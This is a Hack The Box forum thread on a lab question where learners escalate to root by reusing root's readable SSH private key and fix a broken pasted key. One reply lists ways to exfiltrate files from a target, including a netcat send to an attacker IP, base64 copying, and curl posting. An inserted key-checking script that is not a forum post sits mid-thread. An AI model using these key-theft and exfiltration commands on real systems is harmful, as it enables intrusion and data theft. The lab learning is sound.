Module - Getting Started - Privilege Escalation - Second question

Hello all. I have been stuck on the following question in the getting started module for a bit and figured it is time to reach out and see if anyone can shine some light on this for me. Here is the question.

" Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'. "

Anyone that has completed this module - could you post a hint / maybe point to a section inside the module that the answer is in relation to?

Hack The Box

Comments

  • I don't know if you passed this question, but I suggest looking for ssh keys.

  • @elementz1 said:

    I don't know if you passed this question, but I suggest looking for ssh keys.

    Any tips for the second question? I have checked the .ssh folder but I don't have the permission to read the keys

  • I resolved it.. just enumerate the target machine and look at ssh keys

  • Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

    ssh [email protected] -i /path/to/mykey

    but I am unable to get in. It always asks for a password. I've tried user user1 user2 and root as the username but no luck. Any tips are appreciated.

  • @NewHax said:

    Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

    ssh [email protected] -i /path/to/mykey

    but I am unable to get in. It always asks for a password. I've tried user user1 user2 and root as the username but no luck. Any tips are appreciated.

    Before it asks for a password does it say the permissions are incorrect?

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

  • edited May 11

    @TazWake

    I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

    I do receive an error that says 'invalid format' though.

    I am running the following command

    ssh [email protected]_of_target -p portnumber -i /path/to/my/id_rsa

  • @NewHax said:

    @TazWake

    I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

    I do receive an error that says 'invalid format' though.

    I am running the following command

    ssh [email protected]_of_target -p portnumber -i /path/to/my/id_rsa

    Ok - so the first things to consider.

    If the remote server is asking for a password, then your key isn't working. If your system is asking for the password, then it is a password protected key.

    So if your key isn't working, you need to check what could be causing that.

    • try file /path/to/your/id_rsa
    • try cat /path/to/your/id_rsa to make sure it is the same file and no extra characters appeared
    • try comparing filesize and word count (wc -l) to make sure the files are identical.

  • edited May 11

    @TazWake

    Taz - Thank you so damn much. You not only pointed me in the right direction but gave me insight into how to view the problem to find the right solution. I was finally able to complete this with your help.

    wc -l saved the day.

    The issue I was having was when copy and pasting it was taking 37 lines of text and not the desired 38. I had to manually input a blank line at the end of my key to get this to 38.

    Is there a more proper / accurate way to copy and paste files instead of using ' cat filename ' and just highlighting and copy and pasting from terminal?

    Hack The Box
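
The checks suggested in the reply above (`file`, `cat`, `wc -l`) and the cause found in this thread, a missing final newline, can be scripted. This is an added example, not part of any forum post; `check_key_file` and `write_sample` are hypothetical helper names, and the sample file is a constructed placeholder, not a real key.

```sh
#!/bin/sh
# Added example: structural checks on a hand-copied private key file.
# check_key_file and write_sample are hypothetical helper names.
check_key_file() {
    f=$1; problems=""
    [ -r "$f" ] || { echo "unreadable"; return 2; }
    cr=$(printf '\r'); tab=$(printf '\t')

    # ssh ignores private keys that group or others can access.
    [ "$(ls -ld "$f" | cut -c5-10)" = "------" ] || problems="$problems perms-too-open"

    # The armor lines must survive the copy exactly, with no indentation.
    head -n 1 "$f" | grep -q '^-----BEGIN .*PRIVATE KEY-----' || problems="$problems bad-begin-line"
    grep -q '^-----END .*PRIVATE KEY-----' "$f" || problems="$problems bad-end-line"
    grep -q "^[ $tab]" "$f" && problems="$problems indented-lines"

    # Carriage returns appear when the text passes through a Windows editor.
    grep -q "$cr" "$f" && problems="$problems crlf"

    # wc -l counts newline bytes, so an unterminated last line shows up as
    # one line fewer than the original (37 instead of 38 in the thread).
    last=$(tail -c 1 "$f" | od -An -tx1 | tr -d ' \n')
    [ "$last" = "0a" ] || problems="$problems no-trailing-newline"

    if [ -z "$problems" ]; then echo "ok"; return 0; fi
    echo "${problems# }"; return 1
}

# Constructed placeholder with the shape of an OpenSSH key file; not a real key.
write_sample() {
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'CONSTRUCTEDSAMPLEBODYNOTAREALKEY' \
        '-----END OPENSSH PRIVATE KEY-----' > "$1"
    chmod 600 "$1"
}

# Demo: simulate a terminal copy that dropped the final newline.
demo_dir=$(mktemp -d)
write_sample "$demo_dir/good"
printf '%s' "$(cat "$demo_dir/good")" > "$demo_dir/pasted"
chmod 600 "$demo_dir/pasted"
echo "good:   $(check_key_file "$demo_dir/good")"
echo "pasted: $(check_key_file "$demo_dir/pasted")"
rm -rf "$demo_dir"
```

The function prints `ok` or a space-separated list of problems, so a copied file can be checked before it is passed to `ssh -i`.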

  • @NewHax said:

    @TazWake

    Taz - Thank you so damn much.

    Always glad to help.

    Is there a more proper / accurate way to copy and paste files instead of using ' cat filename ' and just highlighting and copy and pasting from terminal?

    The short answer is "it depends."

    You can exfiltrate files from Linux systems in a range of ways.

    For example : cat filename | base64 copy the output and on your own machine cat (paste) | base64 -d > filename and you get a good recreation of the file.

    You can also use netcat to sling the file:

    • first check the file md5sum filename
    • listener on your machine nc -nklvp 12345 > filename
    • send the data on the remote machine nc YOURIP 12345 < filename
    • wait a while, kill the listener (not the remote one as that can kill your shell)
    • check the file on your machine md5sum filename - see if it matches, if it does, win.

    If you have SSH access - scp works. You can get more esoteric with curl posting the data or spinning up a temporary webserver on the victim and grabbing it that way.

    Linux gives you a range of options - it often depends on what will work at the time.

  • @TazWake You are an impressive writer, I always read your comments for more related details once I finish a problem..zzzzzzzzzzzzzz ;-)

  • edited May 24

    When I am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required webpage... can anyone help...

  • edited May 24

    @SPARTANone17 said:

    When I am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required webpage... can anyone help...

    What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

  • You need to provide the real ip or hostname to whatweb, "ip" is just a placeholder. I'm also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

    whatweb 10.10.10.10
    

    Here is the help page for whatweb, with a usage example at the bottom : https://tools.kali.org/web-applications/whatweb

    Let me know if you manage to get it working, best of luck!

  • No, I was using the IP address of the server in place of ip. I was just showing you the syntax earlier. Say the IP of the server was, for example, 10.10.10.121, then I used the command whatweb http://10.10.10.121/nibbleblog/ but that was showing an error to me..

  • Ah, apologies. In that case the command looks correct. Try using whatweb with a site you know to be accessible - e.g. www.google.com. If that works, it is probably worth double checking that the machine you're running the command from is correctly connected to the VPN, and that the target machine is up.

    In this specific case, you already have quite a lot of information on what technologies the target is running - you know, for example, that they are using nibbleblog.

  • @PoirsLJpHY
    I think sometimes the Kali machine loses connection in between or something like that, because when I try to use the PWN box it works fine and I was able to clear the task easily. Or maybe there would have been an error on my side...

  • @TazWake
    Since user2 had read access over root's .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I'm getting 'Connection timeout' error. Any idea on this?

    [email protected]:~$ ssh -p 31958 [email protected] -i id_rsa
    ssh: connect to host 178.62.61.23 port 31958: Connection timed out

    Here's the error, I tried all the users i.e., user1, user2, root. All giving same errors.

  • @SushWannaHack said:

    @TazWake
    Since user2 had read access over root's .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I'm getting 'Connection timeout' error. Any idea on this?

    [email protected]:~$ ssh -p 31958 [email protected] -i id_rsa
    ssh: connect to host 178.62.61.23 port 31958: Connection timed out

    Here's the error, I tried all the users i.e., user1, user2, root. All giving same errors.

    It implies there isn't a route to 178.62.61.23 - are you sure that is the correct IP address?

    The error implies a networking issue. If you are confident the IP and port are correct, it would be worth troubleshooting with traceroute and maybe even nmap.

  • @TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

  • @SushWannaHack said:

    @TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

    I don't know - I haven't looked at this module.

    What is the result of traceroute?

  • @TazWake , I finally resolved the issue and got the flag. I wasn't able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

  • @SushWannaHack said:

    @TazWake , I finally resolved the issue and got the flag. I wasn't able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

    Hey, if it works, it works.
